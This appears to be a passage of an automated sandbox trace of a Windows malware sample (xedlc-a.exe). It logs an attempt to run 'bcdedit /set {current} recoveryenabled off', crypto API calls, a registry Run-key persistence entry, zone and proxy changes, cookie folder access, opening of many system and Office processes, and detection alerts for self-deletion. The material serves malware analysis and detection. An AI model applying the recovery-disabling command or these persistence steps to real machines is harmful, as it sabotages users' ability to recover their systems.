- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54709
- mode: failed
- sequenceNumber: 378
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54714
- mode: failed
- sequenceNumber: 379
- value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 54684
- sequenceNumber: 380
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: dummy.dll
- apiname: ProcessCreate_Failure
- address: 0x7c81d627
- params:
- param (id:1): NULL
- param (id:2): bcdedit.exe /set {current} recoveryenabled off
- param (id:3): 32
- param (id:4): NULL
- apicall:
- timestamp: 54684
- sequenceNumber: 381
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041dca8
- params:
- param (id:1): 1000
- regkey:
- timestamp: 55669
- mode: added
- sequenceNumber: 382
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\zsys\
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 55674
- mode: failed
- sequenceNumber: 383
- value: C:\Documents and Settings\admin\Application Data\NETAPI32.DLL
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 56287
- sequenceNumber: 384
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: advapi32.dll
- apiname: CryptAcquireContextW
- address: 0x0041b858
- params:
- param (id:1): NULL
- param (id:2): NULL
- param (id:3): 1
- param (id:4): 4026531840
- file:
- timestamp: 56368
- mode: failed
- sequenceNumber: 385
- value: C:\Documents and Settings\admin\Application Data\rsaenh.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 56373
- mode: failed
- sequenceNumber: 386
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\rsaenh.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 56486
- mode: failed
- sequenceNumber: 387
- value: C:\Documents and Settings\admin\Application Data\crypt32.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 56519
- sequenceNumber: 388
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: advapi32.dll
- apiname: CryptAcquireContextW
- address: 0x0041b8ac
- params:
- param (id:1): NULL
- param (id:2): Intel Hardware Cryptographic Service Provider
- param (id:3): 22
- param (id:4): 0
- apicall:
- timestamp: 56605
- sequenceNumber: 389
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Process32First
- address: 0x0041bb04
- params:
- param (id:1): 0x1c8
- param (id:2): 0x12d4c8
- malicious-alert:
- classtype: Generic-Anomalous-Activity
- weight: 0
- ruleid: 8007 : Enumerating running processes ; Process is enumerating running processes
- msg: Process is enumerating running processes
- display-msg: Enumerating running processes
- regkey:
- timestamp: 56618
- mode: setval
- sequenceNumber: 390
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\zsys\"ID" = 40 90 94 9d dc d5 a0 a4
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 56666
- mode: added
- sequenceNumber: 391
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\4090949DDCD5A0A4
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 56684
- mode: setval
- sequenceNumber: 392
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\4090949DDCD5A0A4\"data" = 31 4b 79 36 32 77 6f 4e 44 74 64 36 55 63 67 74 34 64 62 50 44 79 47 44 51 6b 77 5a 78 74 47 36 57 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 8b 89 21 a0 72 ed 08 a9 e0 fc ec 34 58 d6 4c d4 91 83 df 1c 45 da 83 70 39 8e 65 08 6c 49 3b cf eb ea 58 fe db 5b 88 c0 84 2b 42 94 01 e6 5f 1e b3 3f 34 40 74 e6 3d ce 20 51 e9 89 74 65 d4 9f 00 00 37 41 37 34 35 36 42 31 31 39 38 46 32 36 43 44 32 43 41 46 39 33 37 45 31 34 34 38 33 41 34 33 41 36 44 35 39 30 31 35 35 37 45 39 43 34 45 35 32 39 42 38 32 33 35 39 39 30 37 38 44 44 35 39 33 34 36 31 33 30 37 30 33 43 32 45 39 37 46 41 44 41 32 46 44 41 46 42 34 39 42 32 45 37 32 38 42 37 39 39 46 45 41 30 35 36 39 34 39 42 43 43 35 42 32 42 42 30 36 42 31 33 31 39 42 44 41 46 00 00 00 00 04 54 e8 cb 98 dc 40 63 37 1d b8 b7 d4 c6 bb ba 94 d4 ce 42 d2 52 aa 69 40 fa 7e a9 9f cb 24 14 3e bf df f3 19 a6 4b bc a2 5f a3 7b 50 5!
- 4 db 41 5f c1 cf 09 b0 ec 1d 15 29 15 aa 68 ed 3c 5d ed d8 00 00 00 00 00 00 00 00 71 79 62 56 00 00 00 00
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 56714
- mode: added
- sequenceNumber: 393
- value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 56719
- mode: setval
- sequenceNumber: 394
- value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"EnableLinkedConnections" = 0x00000001
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10068 : Process deleting itself ; Process deleting itself in any manor
- msg: Process deleting itself in any manor
- display-msg: Process deleting itself
- regkey:
- timestamp: 56867
- mode: added
- sequenceNumber: 395
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Run
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 56871
- mode: setval
- sequenceNumber: 396
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Run\"Acronis"\"Cache" = C:\Documents and Settings\admin\Local Settings\Temporary Internet Files
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 57540
- sequenceNumber: 473
- value: \BaseNamedObjects\ZonesCounterMutex
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 57540
- sequenceNumber: 474
- value: \BaseNamedObjects\ZoneAttributeCacheCounterMutex
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 57540
- sequenceNumber: 475
- value: \BaseNamedObjects\ZonesCacheCounterMutex
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 57540
- mode: setval
- sequenceNumber: 476
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 57540
- mode: setval
- sequenceNumber: 477
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 57540
- mode: setval
- sequenceNumber: 478
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 57540
- mode: setval
- sequenceNumber: 479
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 57540
- sequenceNumber: 480
- value: \BaseNamedObjects\ZoneAttributeCacheCounterMutex
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 57563
- sequenceNumber: 481
- value: \BaseNamedObjects\ZonesLockedCacheCounterMutex
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 57563
- mode: setval
- sequenceNumber: 482
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 57563
- mode: setval
- sequenceNumber: 483
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 57563
- mode: setval
- sequenceNumber: 484
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 57563
- mode: setval
- sequenceNumber: 485
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- folder:
- timestamp: 57610
- mode: open
- sequenceNumber: 486
- value: C:\Documents and Settings\admin\Cookies
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x200000
- regkey:
- timestamp: 57564
- mode: added
- sequenceNumber: 487
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 57564
- mode: setval
- sequenceNumber: 488
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Cookies"\"ComputerName"
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57828
- mode: opened
- sequenceNumber: 528
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 4
- imagepath: System
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57832
- mode: opened
- sequenceNumber: 529
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 316
- imagepath: C:\WINDOWS\system32\smss.exe
- md5sum: 5f816c1f539266d2d4c78694239da0b5
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57838
- mode: opened
- sequenceNumber: 530
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 420
- imagepath: C:\WINDOWS\system32\csrss.exe
- md5sum: 44f275c64738ea2056e3d9580c23b60f
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57843
- mode: opened
- sequenceNumber: 531
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 444
- imagepath: C:\WINDOWS\system32\winlogon.exe
- md5sum: ed0ef0a136dec83df69f04118870003e
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57848
- mode: opened
- sequenceNumber: 532
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 552
- imagepath: C:\WINDOWS\system32\services.exe
- md5sum: 0e776ed5f7cc9f94299e70461b7b8185
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57853
- mode: opened
- sequenceNumber: 533
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 564
- imagepath: C:\WINDOWS\system32\lsass.exe
- md5sum: bf2466b3e18e970d8a976fb95fc1ca85
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57859
- mode: opened
- sequenceNumber: 534
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 716
- imagepath: C:\WINDOWS\system32\svchost.exe
- md5sum: 27c6d03bcdb8cfeb96b716f3d8be3e18
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57864
- mode: opened
- sequenceNumber: 535
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 776
- imagepath: C:\WINDOWS\system32\svchost.exe
- md5sum: 27c6d03bcdb8cfeb96b716f3d8be3e18
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57869
- mode: opened
- sequenceNumber: 536
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 840
- imagepath: C:\WINDOWS\system32\svchost.exe
- md5sum: 27c6d03bcdb8cfeb96b716f3d8be3e18
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57873
- mode: opened
- sequenceNumber: 537
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 892
- imagepath: C:\WINDOWS\system32\svchost.exe
- md5sum: 27c6d03bcdb8cfeb96b716f3d8be3e18
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57878
- mode: opened
- sequenceNumber: 538
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1164
- imagepath: C:\WINDOWS\system32\spoolsv.exe
- md5sum: d8e14a61acc1d4a6cd0d38aebac7fa3b
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57884
- mode: opened
- sequenceNumber: 539
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1800
- imagepath: C:\WINDOWS\system32\alg.exe
- md5sum: 8c515081584a38aa007909cd02020b3d
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57889
- mode: opened
- sequenceNumber: 540
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1864
- imagepath: C:\WINDOWS\system32\wscntfy.exe
- md5sum: f92e1076c42fcd6db3d72d8cfe9816d5
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57894
- mode: opened
- sequenceNumber: 541
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1900
- imagepath: C:\Program Files\Messenger\msmsgs.exe
- md5sum: 3e930c641079443d4de036167a69caa2
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57898
- mode: opened
- sequenceNumber: 542
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1924
- imagepath: C:\WINDOWS\system32\ctfmon.exe
- md5sum: 5f1d5f88303d4a4dbc8e5f97ba967cc3
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57903
- mode: opened
- sequenceNumber: 543
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2684
- imagepath: C:\WINDOWS\explorer.exe
- md5sum: 12896823fb95bfb3dc9b46bcaedc9923
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57911
- mode: opened
- sequenceNumber: 544
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2768
- imagepath: C:\Program Files\Internet Explorer\iexplore.exe
- md5sum: b60dddd2d63ce41cb8c487fcfbb6419e
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57916
- mode: opened
- sequenceNumber: 545
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 3048
- imagepath: C:\Program Files\Internet Explorer\iexplore.exe
- md5sum: b60dddd2d63ce41cb8c487fcfbb6419e
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57921
- mode: opened
- sequenceNumber: 546
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 3132
- imagepath: C:\Program Files\Internet Explorer7\iexplore.exe
- md5sum: de49b348a18369b4626fba1d49b07fb4
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57925
- mode: opened
- sequenceNumber: 547
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 3184
- imagepath: C:\Program Files\Internet Explorer6\IEXPLORE.EXE
- md5sum: e7484514c0464642be7b4dc2689354c8
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57931
- mode: opened
- sequenceNumber: 548
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 3496
- imagepath: C:\Program Files\Office\OFFICE11\WINWORD.EXE
- md5sum: 7a0fa3a0282b4630f3768a74441d4bae
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57936
- mode: opened
- sequenceNumber: 549
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 3684
- imagepath: C:\Program Files\Office\OFFICE11\EXCEL.EXE
- md5sum: a2557e5e3d8474b5fa2abafe8e025e4e
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57941
- mode: opened
- sequenceNumber: 550
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 3852
- imagepath: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
- md5sum: 443747857245bf90847ae396c53470a6
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57946
- mode: opened
- sequenceNumber: 551
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 3872
- imagepath: C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE
- md5sum: 49a38000d31452a9faf0d8d1774634f6
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57954
- mode: opened
- sequenceNumber: 552
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 3912
- imagepath: C:\Program Files\MSOffice\OFFICE11\WINWORD.EXE
- md5sum: 1eea7dd2f1ea6efef380b99a90228d2f
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57959
- mode: opened
- sequenceNumber: 553
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 4068
- imagepath: C:\Program Files\MSOffice\OFFICE11\EXCEL.EXE
- md5sum: bbcc5d4e09d7fd9454910261e6dc0725
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57963
- mode: opened
- sequenceNumber: 554
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2008
- imagepath: C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
- md5sum: f13f5ac8b89c9ac8d02d1ef7cf9bdf0a
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57969
- mode: opened
- sequenceNumber: 555
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 140
- imagepath: C:\Program Files\Microsoft Office\Office12\EXCEL.EXE
- md5sum: 0187bdafbafaf967bb91b4f2d8e33bc8
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57974
- mode: opened
- sequenceNumber: 556
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 164
- imagepath: C:\Program Files\Microsoft Office\Office12\POWERPNT.EXE
- md5sum: dc53ba349c9284775893b5377e860f2e
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 57981
- mode: opened
- sequenceNumber: 557
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 952
- imagepath: C:\WINDOWS\system32\wbem\wmiprvse.exe
- md5sum: 0ffae66e6d5b1c87cbd22d1f3b6079fd
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 57909
- mode: added
- sequenceNumber: 558
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 57909
- mode: setval
- sequenceNumber: 559
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"History" = C:\Documents and Settings\admin\Local Settings\History
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 57909
- mode: setval
- sequenceNumber: 560
